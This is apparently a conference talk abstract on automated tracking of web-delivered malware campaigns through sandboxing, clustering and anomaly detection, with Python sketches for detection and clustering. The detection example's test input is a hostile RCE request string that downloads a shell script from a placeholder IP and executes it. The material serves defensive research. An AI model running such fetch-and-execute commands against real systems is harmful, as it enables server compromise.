Unmasking APT Malware Activity: Real-World Malware Campaign Tracking Using Big Data Analytics and Machine Learning Clustering
2024-12-14 , Track 2

Our talk introduces a framework for automating the identification and handling of malware samples targeting web servers, leveraging big data analytics and machine learning to cluster and track active malware campaigns. We will demonstrate how the framework employs heuristic analysis to autonomously identify and process web-delivered malware samples. This improves the efficiency and accuracy of malware detection in large data sets, reduces reliance on manual intervention, and enables near real-time threat hunting and campaign tracking.

Building upon the collected malware data, we use big data analytics techniques to track and monitor malware and to cluster similar samples and their associated network activity, unveiling patterns and connections between campaigns. This clustering approach provides deeper insight into the tactics, techniques, and procedures (TTPs) employed by threat actors, facilitating the identification of overarching strategies and objectives.

We will conclude with a detailed analysis of notable real-world malware campaigns identified through this system. Attendees will gain insights into the operational methodologies of these campaigns, their impact and the defensive measures that can be employed. Case studies will highlight real-world applications and the effectiveness of our automated approach in enhancing cybersecurity posture.


In this talk we will conduct a deep dive into the framework we developed for automating the identification and handling of malware samples targeting web servers. The talk consists of four parts:

Part 1: Introduction

  • Provide a baseline understanding of how threat actors can leverage web vulnerabilities to deploy malware.
  • Introduce the challenge of identifying, clustering and tracking malware data in the real world.
  • Introduce the data we collect, with a focus on the real-world malware data we track.
  • Discuss what can be gained by effectively identifying and tracking malware campaigns in real-world scenarios.

Part 2: Automated Malware Handling

  • Explain and demonstrate the framework we developed to automate the handling of web-delivered malware samples, including:
    1. Identification of malware delivery using RCE attacks against web applications.
    2. Safe downloading, storing and analysis of identified samples using a sandboxed environment.
    3. Importing sample information to enrich existing data.
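
As an illustration of step 1, the following is a minimal sketch of one possible heuristic: scanning a raw HTTP request for a `wget` or `curl` command that fetches a remote file. It is not the framework's actual detection logic; the pattern, the function name `extract_payload_urls` and the sample request are all hypothetical.

```python
import re
from urllib.parse import unquote

# Hypothetical heuristic: a download command (wget/curl) followed, within the
# same shell command, by an http(s) URL. Real RCE payloads are far more varied.
DOWNLOAD_CMD = re.compile(
    r"\b(?:wget|curl)\b[^;|&\n]*?(https?://[^\s'\"`;|&<>)]+)",
    re.IGNORECASE,
)


def extract_payload_urls(raw_request: str) -> list[str]:
    """Return de-duplicated download URLs found in a raw request string."""
    decoded = unquote(raw_request)  # undo percent-encoding before matching
    urls: list[str] = []
    for match in DOWNLOAD_CMD.finditer(decoded):
        url = match.group(1)
        if url not in urls:
            urls.append(url)
    return urls


if __name__ == "__main__":
    # Illustrative request using a documentation-only IP address.
    request = "GET /cgi-bin/x?cmd=wget%20http://198.51.100.7/a.sh%20-O%20/tmp/a;sh%20/tmp/a"
    print(extract_payload_urls(request))
```

URLs extracted this way would then be handed to the sandboxed download and analysis step rather than fetched directly.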

Part 3: Clustering of Malware Data and Anomaly Detection

  • Use big data analytics to aggregate data from multiple cloud regions and calculate distances for clustering.
  • Demonstrate a novel open-source tool we developed for counter collection, aggregation and anomaly detection, powered by an SQL engine and cloud functions.
  • Explain how the tool uses advanced detection methods to surface trends and patterns in the malware data.
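
To make the idea of distance-based clustering concrete, the following is a minimal sketch that assumes each sample is described by a set of observed indicators (for example source IPs, dropped file paths, or family tags). It uses Jaccard distance and a simple single-linkage grouping under a threshold; the talk does not state which distance or clustering algorithm the framework uses, so the feature sets, the `max_distance` value and the function names are all illustrative assumptions.

```python
from itertools import combinations


def jaccard_distance(a: set, b: set) -> float:
    """1 - |a ∩ b| / |a ∪ b|; two empty sets are treated as identical."""
    union = a | b
    if not union:
        return 0.0
    return 1.0 - len(a & b) / len(union)


def cluster_samples(features: dict, max_distance: float = 0.5) -> list:
    """Group sample IDs whose feature sets are within max_distance.

    Single-linkage: samples are joined transitively via a union-find.
    """
    parent = {sample: sample for sample in features}

    def find(x):
        # Follow parent links to the cluster root, compressing the path.
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in combinations(features, 2):
        if jaccard_distance(features[a], features[b]) <= max_distance:
            parent[find(a)] = find(b)

    groups = {}
    for sample in features:
        groups.setdefault(find(sample), set()).add(sample)
    return sorted(groups.values(), key=lambda g: sorted(g))


if __name__ == "__main__":
    # Hypothetical indicator sets; the IPs are documentation-only addresses.
    samples = {
        "s1": {"198.51.100.7", "xmrig", "/tmp/a"},
        "s2": {"198.51.100.7", "xmrig", "/tmp/b"},
        "s3": {"203.0.113.9", "ransom-note"},
    }
    print(cluster_samples(samples))
```

Pairwise comparison is quadratic in the number of samples, so at data-lake scale the distance calculation would more plausibly be pushed into the query engine; this sketch only shows the grouping logic.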

Part 4: Identified Campaigns

Review several campaigns detected by the framework, including:
- Sysrv Botnet: How we identified and correlated events related to activity of the Sysrv botnet, uncovering new attack vectors and TTPs. (https://tinyurl.com/sysrvb)
- AndroxGh0st: How we identified AndroxGh0st malware activity and were able to provide previously undocumented TTPs and attack vectors, augmenting a previously published report by CISA. (https://tinyurl.com/axghost)
- TellYouThePass: How we quickly uncovered a malicious campaign to deliver TellYouThePass ransomware leveraging the new PHP vulnerability CVE-2024-4577. (https://tinyurl.com/tytpr)
- 8220 Gang: How we exposed new tactics and vectors used by the well-known threat actor group 8220 Gang. (https://tinyurl.com/8220gang)
- APT29: How we were able to identify and track activity from the Russian APT specifically targeting Polish government domains to drop RAT malware. (unpublished)

Attendees can expect the following takeaways:

  1. Utilizing a combination of automation, big data analytics, and anomaly detection allows you to effectively identify and track cyber attacks. Usage of common tools like cloud data lakes and managed query engines can make such tasks quick and efficient.

  2. Many threat actors, including APT groups, commonly use web vulnerabilities to target nation states and propagate dangerous malware. This activity can be consistently detected using the demonstrated framework.

  3. Identification, correlation and tracking of malware campaign activity is of interest to a wide demographic within the security community. We aim to provide a useful set of ideas and tools to assist with this difficult problem.

Daniel Johnston is a security researcher in the Imperva Threat Research group. Daniel holds an MSc in Cyber Security from Queen's University Belfast and has over 7 years of experience in network and web application security. At Imperva, Daniel specializes in web application security, bot detection, malware and threat intelligence research.

Security Researcher, Data Engineer, and Data Scientist at Imperva Threat Research Group. I specialize in application and database security, leveraging expertise in data analytics, data science, and automation to drive innovative security solutions.